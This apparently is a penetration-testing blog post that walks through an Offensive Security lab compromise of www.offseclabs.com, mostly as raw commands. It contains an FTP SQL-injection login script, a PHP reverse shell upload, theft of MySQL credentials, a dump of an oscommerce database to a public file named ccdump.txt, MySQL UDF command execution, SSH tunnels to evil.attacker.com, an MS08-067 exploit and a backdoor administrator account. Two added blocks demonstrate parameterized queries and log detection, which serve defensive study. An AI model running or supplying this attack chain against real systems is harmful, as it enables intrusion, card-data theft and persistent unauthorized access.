I’m Back :) : Penetration Testing in the Real World

Sorry everyone for the big delay of 3 months 😐. I got busy with my exams and so I couldn't give time to you all, but now I have returned to the field, so let's get started....
Well, enjoy this awesome video from Offensive Security:

ftp-brute.py

#!/usr/bin/env python3
from ftplib import FTP

print("Attempting user directory discovery via FTP")
for i in range(0, 6):
    # Injected username: the UNION returns one ftpuser row per iteration (LIMIT i,1),
    # so each login lands in a different account's home directory
    username = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser "
                "LIMIT " + str(i) + ",1; -- ")
    password = "1"
    ftp = FTP('www.offseclabs.com')
    ftp.login(username, password)
    print("Logged in as ftpuser row " + str(i))
    ftp.retrlines('LIST')
    ftp.close()
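To show why the injected username in ftp-brute.py works and what the server-side fix looks like, here is an added example (not the post's or Offensive Security's code) that models the FTP server's account lookup against an in-memory SQLite copy of an ftpuser table. The table layout, the query shape and the sample accounts are assumptions; the injected string is the one from the post.

```python
import sqlite3

# Constructed sample accounts standing in for the ftpuser table (assumed layout).
FTPUSERS = [
    ("bob",   "bob",   1001, 1001, "/home/bob",   "/bin/false"),
    ("alice", "alice", 1002, 1002, "/home/alice", "/bin/false"),
    ("carol", "carol", 1003, 1003, "/home/carol", "/bin/false"),
    ("dave",  "dave",  1004, 1004, "/home/dave",  "/bin/false"),
    ("erin",  "erin",  1005, 1005, "/home/erin",  "/bin/false"),
    ("www",   "www",   33,   33,   "/var/www",    "/bin/false"),
]

# The username from the post; LIMIT n,1 picks one account row per login attempt.
INJECTED_USER = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell "
                 "from ftpuser LIMIT 5,1; -- ")


def make_db():
    """In-memory SQLite stand-in for the MySQL table behind the FTP server."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ftpuser (user TEXT, password TEXT, uid INT, "
               "gid INT, homedir TEXT, shell TEXT)")
    db.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?)", FTPUSERS)
    return db


def lookup_vulnerable(db, user, password):
    """Assumed original pattern: credentials spliced into the SQL text.
    The quote in the username closes the string, 'and 1=2' empties the real
    result, the UNION substitutes an arbitrary ftpuser row, and '-- '
    comments out the password check, which is why password "1" is accepted."""
    sql = ("SELECT user, password, uid, gid, homedir, shell FROM ftpuser "
           f"WHERE (user = '{user}') AND password = '{password}'")
    return db.execute(sql).fetchone()


def lookup_parameterized(db, user, password):
    """Hardened form: bound parameters keep quotes and comments as data."""
    sql = ("SELECT user, password, uid, gid, homedir, shell FROM ftpuser "
           "WHERE (user = ?) AND password = ?")
    return db.execute(sql, (user, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, INJECTED_USER, "1"))
    print("parameterized:", lookup_parameterized(db, INJECTED_USER, "1"))
```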

Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)

ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; -- 
password – 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py -> (see ftp-brute.py above)
./brute.py
(get the fifth user, whose home directory is mapped to the web server's document root)
clear

ftp www.offseclabs.com
username – %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; -- 
password – 1

(logged in as the fifth user)
ls
put rs.php -> (a PHP reverse shell)

———————–
Open Terminal B :

nc -lvp 80

———————–
Open Terminal C :

wget http://www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

———————–
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

————————
Open a Firefox :

http://www.offseclabs.com/images/ccdump.txt
(we got the database dump)

————————-
Go back to Terminal A :

(inside the ftp server)
put up.html -> (file upload HTML page)
put up.php -> (file upload PHP handler)

————————-
Open Firefox :

http://www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and mark it as 1)
(upload rs [a binary reverse shell] and mark it as 2)

** Details of lib_mysqludf_sys.so

—————————
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

—————————-
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don’t press Enter at this moment)
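As a defender's counterpart to the UDF steps above, here is an added detection example (not from the post or Offensive Security) that scans MySQL general-log lines for the lib_mysqludf_sys pattern: a shared library written with INTO DUMPFILE, a CREATE FUNCTION ... SONAME registration, and a sys_eval/sys_exec call on the same connection. The log excerpt is constructed and the rule names are assumed labels.

```python
import re

# Constructed MySQL general-log excerpt in the classic "time  id command  argument"
# layout, modelled on the Terminal B statements above plus ordinary shop traffic.
SAMPLE_LOG = """\
100115 12:00:03\t   12 Query\tSELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so'
100115 12:00:04\t   12 Query\tSELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd'
100115 12:00:05\t   12 Query\tCREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
100115 12:00:06\t   12 Query\tSELECT sys_eval('chmod 755 /tmp/bd')
100115 12:00:07\t   13 Query\tSELECT products_name FROM products WHERE products_id = 7
100115 12:00:08\t   13 Query\tSELECT * FROM orders INTO OUTFILE '/tmp/orders.csv'
"""

QUERY_RE = re.compile(r"\s(\d+)\s+Query\s+(.*)$")  # connection id and statement

# Ordered rules; the first match wins. Tag names are assumed labels for this example.
RULES = [
    ("dumpfile-library", re.compile(r"\bINTO\s+DUMPFILE\s+'[^']*\.(?:so|dll)'", re.I)),
    ("file-write",       re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\s+'", re.I)),
    ("udf-register",     re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I)),
    ("udf-exec",         re.compile(r"\bsys_(?:eval|exec|set|get)\s*\(", re.I)),
]

def flag_udf_abuse(lines):
    """Return (connection_id, tag, statement) for each Query line matching a rule."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:  # Connect, Quit, Init DB and other non-Query records are skipped
            continue
        conn_id, stmt = m.group(1), m.group(2)
        for tag, pattern in RULES:
            if pattern.search(stmt):
                hits.append((conn_id, tag, stmt))
                break
    return hits

def udf_chains(hits):
    """Connection ids that wrote a library, registered a UDF and called it:
    the full lib_mysqludf_sys sequence, not just a lone OUTFILE export."""
    needed = {"dumpfile-library", "udf-register", "udf-exec"}
    seen = {}
    for conn_id, tag, _ in hits:
        seen.setdefault(conn_id, set()).add(tag)
    return {c for c, tags in seen.items() if needed <= tags}

if __name__ == "__main__":
    found = flag_udf_abuse(SAMPLE_LOG.splitlines())
    print(len(found), "suspicious statements; full UDF chain on:", sorted(udf_chains(found)))
```

The lone OUTFILE export on connection 13 is reported but does not form a chain, which is the distinction an analyst wants before escalating.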

—————————
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)

—————————-
Open Terminal E :

nc -lvp 80

—————————-
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');

(press enter and we got another reverse shell at Terminal E)

—————————
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

—————————–
Open Terminal F :

netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

—————————–
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

——————————
Go back to Terminal F :

cd core
nano nx.py -> (an MS08-067 Python exploit for Windows 2003 SP2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add

———————————
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

———————————–
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username – hacker and password – hacker)

Enjoy 🙂 see ya!!
